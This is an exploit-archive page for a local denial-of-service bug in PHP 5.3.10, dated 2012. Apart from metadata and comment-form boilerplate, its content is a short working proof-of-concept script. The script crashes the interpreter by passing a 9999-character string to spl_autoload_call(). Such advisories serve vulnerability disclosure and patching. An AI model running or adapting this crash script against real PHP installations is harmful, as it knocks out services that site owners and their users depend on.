PHP 5.3.10 spl_autoload_call() Denial Of Service

2012.06.04
Credit: Pr0T3cT10n
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

<?php ##################################################################### ## PHP 5.3.10 spl_autoload_call() Local Denial of Service ## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10 ## Date: 02/06/2012 ## Local Denial of Service ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com> ## ISRAEL ## http://www.0x31337.net ##################################################################### $buffer = str_repeat("A",9999); spl_autoload_call($buffer); ?>

References:

http://www.0x31337.net


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top